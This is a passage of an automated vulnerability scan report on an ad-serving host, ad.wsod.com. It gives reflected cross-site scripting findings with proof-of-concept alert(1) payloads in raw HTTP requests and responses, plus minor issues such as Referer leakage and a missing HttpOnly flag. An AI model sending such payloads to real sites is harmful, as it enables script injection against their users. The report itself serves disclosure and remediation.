This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459**;10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*28162'-alert(1)-'b1d917b4042 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:27:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1354:799:44:0:35107:1292776020:L|46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2; expires=Tue, 18-Jan-2011 16:27:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 733

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*28162'-alert(1)-'b1d917b4042http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.799.iframe.200x33/**;10.1103;1920;1200;http:_@2F_@2Fatt.my.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more
...[SNIP]...

1.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be69a'-alert(1)-'c5fc81817e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292775459**;10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*&be69a'-alert(1)-'c5fc81817e7=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2295259579550475?click=http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2|33:353:22:3:0:30519:1292358011:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 16:27:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1354:801:44:0:35107:1292776037:L|46:569:476:0:0:30551:1292380110:B2|33:1521:521:0:0:30519:1292358015:B2; expires=Tue, 18-Jan-2011 16:27:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 736

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15qem2pt0/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292782652/L=8QSZRdG_bJNNRxgxTLCmHAQNrnneEk0OMBwAAgEi/B=a.q9EEJe5iY-/J=1292775452496565/K=vhDWaoR5BWN_21Tyf.LsjQ/A=6192643/R=0/*&be69a'-alert(1)-'c5fc81817e7=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.801.iframe.200x33/**;10.1103;1920;1200;http:_@2F_@2Fatt.my.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://att.my.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L|46:569:476:0:0:30551:1292380110:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 17:17:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2227

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.img.200x33/1292779066**;" />
...[SNIP]...

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**;10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/*
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L|46:569:476:0:0:30551:1292380110:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 17:17:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1354:832:44:0:35107:1292779066:L|46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L; expires=Tue, 18-Jan-2011 17:17:46 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 705

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.832.iframe.200x33/**;10.1103;1920;1200;http:_@2F_@2Fatt.my.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="//admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/edu_1_200x33.jpg" alt="Online $7 Trades! Click to find out more!" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**;10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/*
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L|46:569:476:0:0:30551:1292380110:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 17:17:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1354:832:44:0:35107:1292779066:L|46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L; expires=Tue, 18-Jan-2011 17:17:46 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 705

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCm
...[SNIP]...

4. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1292779066**;10,1,103;1920;1200;http%3A_@2F_@2Fatt.my.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.3619080791249871?click=http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCmHAMnrnneEk0OPjoAAI4o/B=DWAxEUJe5ls-/J=1292779066053084/K=byHOUtFI6sSkEbhg51s4xg/A=6192643/R=0/*
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; fp=138000:eq:1:CS:02:2:1292256153:1:33; i_1=46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L|46:569:476:0:0:30551:1292380110:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 17:17:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1354:832:44:0:35107:1292779066:L|46:1354:832:44:0:35107:1292776047:L|46:1354:271:44:0:35107:1292775460:L; expires=Tue, 18-Jan-2011 17:17:46 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 705

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15qc1kpla/M=757168.14413522.14266813.12989431/D=sbcedit/S=360461785:RQ/Y=YAHOO/EXP=1292786266/L=PJw6ltG_bJNNRxgxTLCm
...[SNIP]...

Report generated by XSS.CX at Sun Dec 19 11:58:50 CST 2010.